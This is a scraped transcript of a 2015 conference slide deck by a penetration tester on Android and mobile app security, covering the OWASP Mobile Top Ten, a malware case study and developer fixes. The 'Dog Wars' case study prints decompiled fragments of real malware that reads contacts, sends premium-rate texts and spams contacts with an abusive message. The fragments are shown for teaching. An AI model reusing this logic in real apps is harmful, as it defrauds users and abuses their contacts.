isaca – mobile computing hacking for computer security bsc 25,000 word dissertation mobile [in]...
Post on 21-May-2018
219 Views
Preview:
TRANSCRIPT
Welcomewelcome to my presentation
ISACA – Leeds – 18th November 2015
Please save all questions until the end of the presentation
Let`s start!
1
2
3
4
About meWho am I?
Introduction to MobileWhy mobile
Mobile Security ChallengesFrom a business point-of-view
OWASPMobile Security Project
5
6
7
Common VulnerabilitiesReal examples, including Malware
FixesDevelop secure code
The future of mobileWhere I see the future going
End of presentationThank you for your attention
AboutMeWho am I?
Andrew PannellAndrew/Andy/Andi
Ethical Hacking for Computer Security BSc25,000 word dissertation mobile [in]security
OWASP Mobile Security ProjectMember, Contributor, Android SME
Penetration TesterWorking for Pentest Limited. Based in London office
CREST ICS Technical AssuranceIndustrial Control Systems/SCADA
www.pentest.co.uk
AboutUsWho are Pentest?
Pentest Limited
Established in 2001
CREST Member company
Application security specialists
Research
www.pentest.co.uk
(Council Registered Ethical Security Testers)
AboutYouWho are my audience?
Developers?
Security Professionals?
Apple?
Techies?
Android?
www.pentest.co.uk
PhonesTimelineHow phones have developed
1999 Blackberry 850
First device released under the Blackberry brand
1997Nokia 6110
Three games, calculator, works as pager
1875 – A.G. Bell invents telephone
www.pentest.co.uk
PhonesTimelineHow phones have developed
2000Nokia 3310
The one your mates had at school. Indestructible
2001 Symbian S80
Nokia’s OS. Runs Java files.
2004First mobile virus “Cabir”
Spread via Bluetooth, harmless shows “cabre”
www.pentest.co.uk
PhonesTimelineHow phones have developed
2006 Symbian S60 & Nokia N95
Mandatory code signing
2008Apple iPhone and Android
Launch of smartphones with ability to purchase apps
Present
www.pentest.co.uk
MobileIntroductionBig money in mobile
$77 billionper year
100 apps installed
75% fail basic
security
56 million items of data
Revenue of mobile applications worldwide
Average number of applications installed
per user mobile device
According to Garner even basic
security fails to implemented on
mobile apps
Unencrypted, unsecured, unprotected
private user data
MobileStatistics
www.pentest.co.uk
MobileSecurityOn average 9 vulnerabilities per application
28% 34% 25% 13%
No direct threat, more a
risk and does not cause
damage by itself. But may
be leveraged with other
vulnerabilities to launch
further attacks.
LowImposes some
affect/damage to the
application. Can assist an
attack to launch further
attacks.
MediumPotential to directly
compromise CIA,
likelihood is not high.
Possible damage is high
but not a total disaster.
HighMajor security risk, with
direct exploit. Ability to
cause major damage to
the application/company.
Likelihood is high.
Critical
www.pentest.co.uk
Source:https://www.checkmarx.com/2015/11/05/the-state-of-mobile-app-security/
AndroidIntroductionWhy Android?
1.5 million daily activations with over 1 billion active users
Over 4000 Android devices
83% of worldwide market share
www.pentest.co.uk
AndroidIntroductionMore about Android
Part compiled apps
Internal Storage and SD card
SQLite database
Activities/Intents/Services/Broadcasts/Content providers
Overview
www.pentest.co.uk
AndroidSecurityAndroid Security Model
Sandboxing
The Android Application Sandbox, which isolates your app data and code execution from other apps..
Permissions model
User-granted permissions to restrict access to system features and user data.
Application-defined permissions to control application data on a per-app basis.
Application Isolation
www.pentest.co.uk
BusinessChallengesDifficulties with mobile
The emergence of mobile as new tech, means the use of new developers. Straight out of university
making the same old web security mistakes.
Rush to market, to get there first before competitors.
BYOD means that hostile mobile devices are now connecting to the enterprise environment.
“Mobile Devices tend to be misplaced, lost or even stolen”
www.pentest.co.uk
OWASPMobileOpen Web Application Security Project
The OWASP Mobile Security Project is a centralized resource intended to give developers and security
teams the resources they need to build and maintain secure mobile applications. Through the project,
our goal is to classify mobile security risks and provide developmental controls to reduce their impact
or likelihood of exploitation.
Our primary focus is at the application layer. While we take into consideration the underlying mobile
platform and carrier inherent risks when threat modelling and building controls, we are targeting the
areas that the average developer can make a difference. Additionally, we focus not only on the mobile
applications deployed to end user devices, but also on the broader server-side infrastructure which the
mobile apps communicate with. We focus heavily on the integration between the mobile application,
remote authentication services, and cloud platform-specific features.
Source: https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
www.pentest.co.uk
OWASPMobile Top 10 2015 (DRAFT)
InsecureAuthorisation
Client CodeQuality Issues
Code Tampering
ReverseEngineering
ExtraneousFunctionality
www.pentest.co.uk
ImproperPlatformUsage
InsecureData
Storage
InsecureCommunications
InsecureAuthentication
InsufficientCrypto
Note: these are in no particular order
OWASPMobileMobile Top Ten 2015 (BETA)
Improper Platform Usage
Violation of development guidelines for security
Unintentional misuse
www.pentest.co.uk
OWASPMobileMobile Top Ten 2015 (BETA)
Insecure Data Storage
Including unintended data leakage
SQL databases, log files, XML manifest, SD card, cookies, the cloud
Internal processes, caches
Analytics
www.pentest.co.uk
Leaving user data unprotected in your app, may allow malicious applications to access it
OWASPMobileMobile Top Ten 2015 (BETA)
Insecure Communications
Weak SSL versions and ciphers
Weak handshake
Clear text communications
Man-in-the-middle
www.pentest.co.uk
Jeopardises the confidentiality of data between your app and the endpoint via MiTM attacks
OWASPMobileMobile Top Ten 2015 (BETA)
Insecure Authentication
Bad/weak session management
Predictive identifiers
Session fixation
Failing to log out properly (e.g. only client-side)
www.pentest.co.uk
Failing to identify a user at all
Risk of exposing data to unidentified users (e.g. anonymous users), invoking web services
OWASPMobileMobile Top Ten 2015 (BETA)
Insufficient Cryptography
Relates to crypto attempted, but poorly
Poor key selection (lack of randomness)
Roll your own crypto?!
www.pentest.co.uk
User data is likely to be exposed, offline brute force, replay attacks
OWASPMobileMobile Top Ten 2015 (BETA)
Insecure Authorisation
Client based authorisation decisions
Permission when logged in
www.pentest.co.uk
Granting access to unauthorised users, invoking services or receive services
OWASPMobileMobile Top Ten 2015 (BETA)
Client Code Quality
Ensure secure coding practices during life cycle
Code level implementation problems on mobile client
Buffer overflow, format string vulnerabilities
www.pentest.co.uk
Exploiting business logic
OWASPMobileMobile Top Ten 2015 (BETA)
Code Tampering
Binary patching
Changes to the application package
Malware
www.pentest.co.uk
Subvert/short-circuit licensing, clone the application for malicious purposes
OWASPMobileMobile Top Ten 2015 (BETA)
Reverse Engineering
Not always a problem (open source)
Can reveal hidden methods and functionality
May lead to code tampering
Bypass logic
www.pentest.co.uk
Bypass security controls and business logic, facilitating other attacks. Business risk, loss of revenue, brand damage, phishing
OWASPMobileMobile Top Ten 2015 (BETA)
Extraneous functionality
Backdoor functionality
Development code left in
www.pentest.co.uk
Exposing extra functionality left in for development
CaseStudyDog O War
Sent texts to contacts
Sent premium rate messages
PETA distanced themselves
Read contacts
Modified Legitimate AppDog War by KAGA Games
MalwareReleased in August 2011
Mobile Malware
CaseStudyDog Wars – Android Manifest
www.pentest.co.uk
<manifest package="kagegames.apps.DWBeta"><uses-permission android:name="android.permission.VIBRATE"/><uses-permission android:name="android.permission.INTERNET"/><uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/><uses-permission android:name="android.permission.READ_PHONE_STATE"/><uses-permission android:name="android.permission.SEND_SMS"/><uses-permission android:name="android.permission.WRITE_SMS"/><uses-permission android:name="android.permission.READ_CONTACTS"/><uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/><meta-data android:name="ADMOB_PUBLISHER_ID" android:value=“NOTKAGAEGAMES"/>
CaseStudyDog Wars – Code
www.pentest.co.uk
package com.dogbite;
public class Rabies
public void onStart(Intent paramIntent, int paramInt) { super.onStart(paramIntent, paramInt); paramIntent = getContentResolver().query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null); SmsManager localSmsManager = SmsManager.getDefault(); if (paramIntent.getCount() > 0) {}
CaseStudyDog Wars – Code
www.pentest.co.uk
if (!((Cursor)localObject).moveToNext()) { localSmsManager.sendTextMessage("73822", null, "text", null, null); break; }
localSmsManager.sendTextMessage(((Cursor)localObject).getString(((Cursor)localObject).getColumnIndex("data1")), null, "I take pleasure in hurting small animals, just thought you should know that", null, null);
CodeExampleStreaming App – 1 variable protection
www.pentest.co.uk
package com.store.app.module.util;import android.view.Window;import com.store.app.util.ScreenshotRestriction;import com.store.app.util.Restrictionpublic class RestrictionsModule{ public static Restriction<Window> screenshotRestrictions() { return new ScreenshotRestriction(true); }}
DeveloperFixesHow to code securely
Code tampering
Prevent reverse engineering by obfuscating code. Check apk matches to prevent allowing modified code to be ran. 1Insecure data storage
Encrypt application data files. Do not store on sdcard (if possible). Be careful of choice of analytics. 2Insecure authorisation and authentication
Assume device is hostile, validate on server-side. 3www.pentest.co.uk
DeveloperFixesHow to code securely
Rooted devices
Can you allow a rooted device to run your application? If so, consider presenting a warning to the user regarding the security of their data. 4
www.pentest.co.uk
MobileFutureAndroid Wear
Android Wear - Works
in conjunction with
mobile device.
Notifications,
interactions, fitness
and health.
www.pentest.co.uk
MobileFutureAndroid TV
Android TV – Smart TV,
Android UI, voice
commands, screen
casting, internet
connected
www.pentest.co.uk
MobileFutureAndroid Auto
Android Auto extends
functionality of the
phone to the car, client-
server with phone,
pulls information from
sensors
www.pentest.co.uk
top related